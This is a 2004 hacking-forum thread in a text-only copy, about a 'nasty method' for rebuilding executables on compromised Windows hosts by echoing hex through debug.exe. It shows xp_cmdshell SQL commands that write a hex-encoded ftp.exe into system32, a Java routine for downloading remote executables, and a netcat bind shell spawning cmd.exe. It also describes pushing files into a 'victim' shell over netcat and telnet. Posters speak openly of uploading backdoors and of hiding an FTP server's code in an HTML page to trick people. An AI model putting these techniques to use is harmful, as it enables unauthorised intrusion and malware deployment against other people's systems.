Full Version: Nasty Method, @echo This Txt To Create Ftp.exe
| QUOTE (The Storm @ Apr 20 2004, 01:48 PM) |
| on SQLEXEC2 (posted in DL section) u can put a few commands in one by binding them with a & but there is no space f.e. echo line 1 >> test.txt&echo line 2 >> test.txt&echo line 3 >> test.txt&... I think ther should be no space. And i don`t know if SQLEXEC2 can handle so many echo commands! if someone put a & after each line pls post the txt here! |
It will work for sql! there you dont have to paste it line by line!
I think a cmd(shell) would get stuck by pasting such huge text but i think with SQLEXEC2 it works just great!
couldn't find sqlexec2 in downloads
also searched throught the net, no results.can anyone share it with us ?
regards
also searched throught the net, no results.can anyone share it with us ?
regards
| QUOTE (The Storm @ Apr 22 2004, 08:55 AM) |
| @B1G what way did u use to make the bat on the remote SQL? |
i use query analyzer
you can run many lines of code like this
| QUOTE |
EXEC [master].[dbo].[xp_cmdshell] "ECHO @ECHO OFF^>1>c:\winnt\system32\ftp.bat" EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0100 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00^>^>1>>c:\winnt\system32\ftp.bat" EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0110 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00^>^>1>>c:\winnt\system32\ftp.bat" EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0120 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00^>^>1>>c:\winnt\system32\ftp.bat" EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0130 00 00 00 00 00 00 00 00 00 00 00 00 D0 00 00 00^>^>1>>c:\winnt\system32\ftp.bat" EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0140 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68^>^>1>>c:\winnt\system32\ftp.bat" EXEC [master].[dbo].[xp_cmdshell] "ECHO echo e 0150 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F^>^>1>>c:\winnt\system32\ftp.bat" |
already posted on codelinx but someone might find it usefull 
all you need is j2sdk installed
this is just a method you can use in any program or echo a class to file
compile and run
all you need is j2sdk installed
this is just a method you can use in any program or echo a class to file
compile and run
| CODE |
| public static String down(String from, String to){ try{ HttpURLConnection connection = (HttpURLConnection) new URL(from).openConnection(); connection.setRequestMethod("GET"); connection.connect(); InputStream is = connection.getInputStream(); FileOutputStream os= new FileOutputStream(new File(to)); int i = 0; while ((i = is.read()) != -1) os.write(i); is.close(); os.close(); connection.disconnect(); } catch(Exception e){ return e.getMessage(); } return null; } usage: down("http://www.somesite.com/ftp.exe","c:\\ftp.exe"); dont forget the http:// and \\ or / instead of \ |
greetz
something like uuencode/uudecode in *nix, but use debug here;)
thats what is called a real good thread :-D
this rox^^
this rox^^
peraps you should upx ftp.exe before create your batch file ^^;
hi
i Did that for a few command line tools:
cmdtools.zip
and coded a GUI so you can script every .exe that way:
exe-script GUI
hf
brainbuster
i Did that for a few command line tools:
cmdtools.zip
and coded a GUI so you can script every .exe that way:
exe-script GUI
hf
brainbuster
very nice man, it is a really good method to copy files!
It doesn't work on Win ME !
didnt understand it, and how i make those files, and i little background on how it works..? tnx 
I think the problem is with double > character.
Windows ME has a 16 bit shell and does not support all commands of NT serries!
Windows ME has a 16 bit shell and does not support all commands of NT serries!
| QUOTE (brainbuster @ May 6 2004, 09:44 PM) |
| hi i Did that for a few command line tools: cmdtools.zip and coded a GUI so you can script every .exe that way: exe-script GUI hf brainbuster |
Help guys,
I tried doing it with wget.exe (not the one posted here, the one which weights 159KB).
It didn't work for me, i used the software someone posted here (cmdtools etc),
It just creates an empty wget.exe file.
Please help me.
I tried doing it with wget.exe (not the one posted here, the one which weights 159KB).
It didn't work for me, i used the software someone posted here (cmdtools etc),
It just creates an empty wget.exe file.
Please help me.
I add here ftp.txt from a win2k SP4 english, what is better with it ?
-smaller , -450 lines to debug
-works now without problems on winXP & win2K & win9x (tested)
A small tip now if you wanna use secureCRT in listening mode to be able then to copy paste the huge .txt without problems:
-*example*-
your localip = 192.168.0.2
run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT , do a simple telnet connection on 192.168.0.2:12345 (youll have a shell of course on your own computer trough securecrt)
Open now another listening netcat2 through this local sCRT shell, you'll be able finally to copy paste this huge txt if a victim spawn a shell to this netcat2 ;p
bye.
-smaller , -450 lines to debug
-works now without problems on winXP & win2K & win9x (tested)
A small tip now if you wanna use secureCRT in listening mode to be able then to copy paste the huge .txt without problems:
-*example*-
your localip = 192.168.0.2
run a listening netcat1 : nc.exe -vv -L -p 12345 -t -e cmd.exe -s 192.168.0.2
With SecureCRT , do a simple telnet connection on 192.168.0.2:12345 (youll have a shell of course on your own computer trough securecrt)
Open now another listening netcat2 through this local sCRT shell, you'll be able finally to copy paste this huge txt if a victim spawn a shell to this netcat2 ;p
bye.
| QUOTE (LittleHacker @ May 8 2004, 07:28 PM) |
| It doesn't work on Win ME ! |
Gee, i wonder why. Maybe if you didnt use the shittiest OS version ever made.
Try 2000, (filtered) xp unless your a massive gamer
hmm just thinking... by u can transfer any file without having ftp/tftp/vbs/rcp access
u can just use the ftp.bat (the bat it creates when first executing) and running on ur computer
nc.exe -L -p [PORT] < ftp.bat
and then on the remote shell:
telnet -f ftp.bat [YOURIP] [PORT]
that will create the ftp.bat and all u need to do is execute it and of course u can instead up backdoors or scanners or "ur system is vulnerable" txt (im sure that will be the most popular
)
bad thing is that ur shell might die cuz telnet do that sometimes
and the reason u cant use it to transfer any file because telnet have a 70 char limit in every line, if u transfer more the data will be moved to the next line and the exe will be corrupted
u can just use the ftp.bat (the bat it creates when first executing) and running on ur computer
nc.exe -L -p [PORT] < ftp.bat
and then on the remote shell:
telnet -f ftp.bat [YOURIP] [PORT]
that will create the ftp.bat and all u need to do is execute it and of course u can instead up backdoors or scanners or "ur system is vulnerable" txt (im sure that will be the most popular
)bad thing is that ur shell might die cuz telnet do that sometimes
and the reason u cant use it to transfer any file because telnet have a 70 char limit in every line, if u transfer more the data will be moved to the next line and the exe will be corrupted
The only trouble with cmdget.exe if I remember right is that it executes the file once it has been downloaded, so if u dont want the file to run you have to remove the extention when u specify where u want to save it.. eg c:\test not c:\test.exe but it would be alot smaller than ftp.exe so maybe its quicker
Really Nasty method
Thx buddy
Thx buddy
Is there some way to do this in exe-to-html... it would be ALOT easyer to trick someone with a http file who contained som pictures, alittle text and a hidden ftp-server hex-code
i would love to make one myself but im no http programmer (sorry)...
(some feedback plz)
i would love to make one myself but im no http programmer (sorry)...
(some feedback plz)
Wowieee...
This is some nice work of you..
Tested it and its working fine...Nice work...
Greetzzz
This is some nice work of you..
Tested it and its working fine...Nice work...
Greetzzz
very well done guys!
The only trouble with cmdget.exe if I remember right is that it executes the file once it has been downloaded, so if u dont want the file to run you have to remove the extention when u specify where u want to save it.. eg c:\test not c:\test.exe but it would be alot smaller than ftp.exe so maybe its quicker
well ... tested it on my machine ... worked fine ;D
thanks a lot ;D
thanks a lot ;D
great methods in thease thread,i´ll test them all :)
thx for it
so long Mrwh!P
thx for it
so long Mrwh!P
it's a very good tools you've shared
more thx
more thx
all i can say is that this is very sexy.. big thx 10/10
10/10
heh awesome thx
That´s very nice, but how do you get the binary codes for .exe?
How could I get the code for small applications so I don´t have to upload them but just create them straight away on the victim´s HD?
How could I get the code for small applications so I don´t have to upload them but just create them straight away on the victim´s HD?
i tried with nc.exe but it doesn't work, the resulting exe gives error
Can someone post the bat for nc.exe?
Please..
Can someone post the bat for nc.exe?
Please..
In attachement is the tool i used to do it.
You have to do some modification to the .bat created to make it smaller then in a txt.
Take my ftp.txt for an example.
Also a tip: Windows XP & maybe others, cant debug something to make it .exe,
thats why in my ftp.txt, windows debug it to ftp.sys , then it rename it in ftp.exe.
also big thx to SAD1c which build this handy proggie.
You have to do some modification to the .bat created to make it smaller then in a txt.
Take my ftp.txt for an example.
Also a tip: Windows XP & maybe others, cant debug something to make it .exe,
thats why in my ftp.txt, windows debug it to ftp.sys , then it rename it in ftp.exe.
also big thx to SAD1c which build this handy proggie.
thank you very much! it works!
Now how can i make the bat smaller then the txt?
Now how can i make the bat smaller then the txt?
Thank you very much 101.
year!!!!!!!!! a very nice method i have to test it hé hé
hé hé
nice work
i fixed cmdget so it gives you the option to excute when downloaded .. get it at http://illmob.org
Great new, thanks for that, your website is so interesting, full of tools and apps that make life easier to evety haxxors..
Great work, carry on
Great work, carry on
True, and in 10 years every person who can get a hold of hacking tools is immeately an hacker without maybe even knowning what an OS is
2 new tips added , 1 to use secureCRT in listening mode , and another one, when
you are on an admin/system shell with the impossibility to copy paste the huge .txt
bye.
Great thread. Gonna give this a go...i never knew windows could build exe files in this way. Great tools and tutorial 101
incredibly - it works very very well for me. thx allot bro!
thx! for this nice tools!
| QUOTE (easternerd @ Mar 14 2004, 07:33 PM) |
| Innovation is the KeyWord i really Congratualte 101 for showing a very simple yet impressive method where we can take advantage of just the Swiss Army Knife alone. |
lol
hey peter how have you been .. havent seen your messenger online much
This is just great m8.. U really r0x that shit.. Thnx a lot for the great method
Eek, I'm late, again ...
I want to give a huge thanks to 101 for this method, and to all who have give a effort into that method, like the "better" ftp.txt and all proggies :-)
Thanks a lots guys, really, it is very very interesting ...
I want to give a huge thanks to 101 for this method, and to all who have give a effort into that method, like the "better" ftp.txt and all proggies :-)
Thanks a lots guys, really, it is very very interesting ...
what could im doing wrong when i try to mix secucrt & psexec?
im running nc in MY machine
i have the paswa of VM (virtual machine) (192.168.1.101)
i conected trough SECURECRT to MY machine
and then
inside SECUREcrt i execute psexec to conect to VM
im running nc in MY machine
i have the paswa of VM (virtual machine) (192.168.1.101)
i conected trough SECURECRT to MY machine
and then
inside SECUREcrt i execute psexec to conect to VM
| QUOTE |
| D:\>psexec \\192.168.1.101 -u Administrator -p test cmd psexec \\192.168.1.101 -u Administrator -p test cmd PsExec v1.43 - execute processes remotely Copyright © 2001-2003 Mark Russinovich www.sysinternals.com cmd exited on 192.168.1.101 with error code 0 |
so, what should i do to execute comands?
nc in "echo method"
just dont forget to rename nc.sys to nc.exe when it ends
just dont forget to rename nc.sys to nc.exe when it ends
nice method
thanks for share it
thanks for share it
hmmmm
ftp.exe says(used securecrt and ftp.txt from page 8):
This program cannot be run in DOS mode.
ftp.exe says(used securecrt and ftp.txt from page 8):
This program cannot be run in DOS mode.
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.
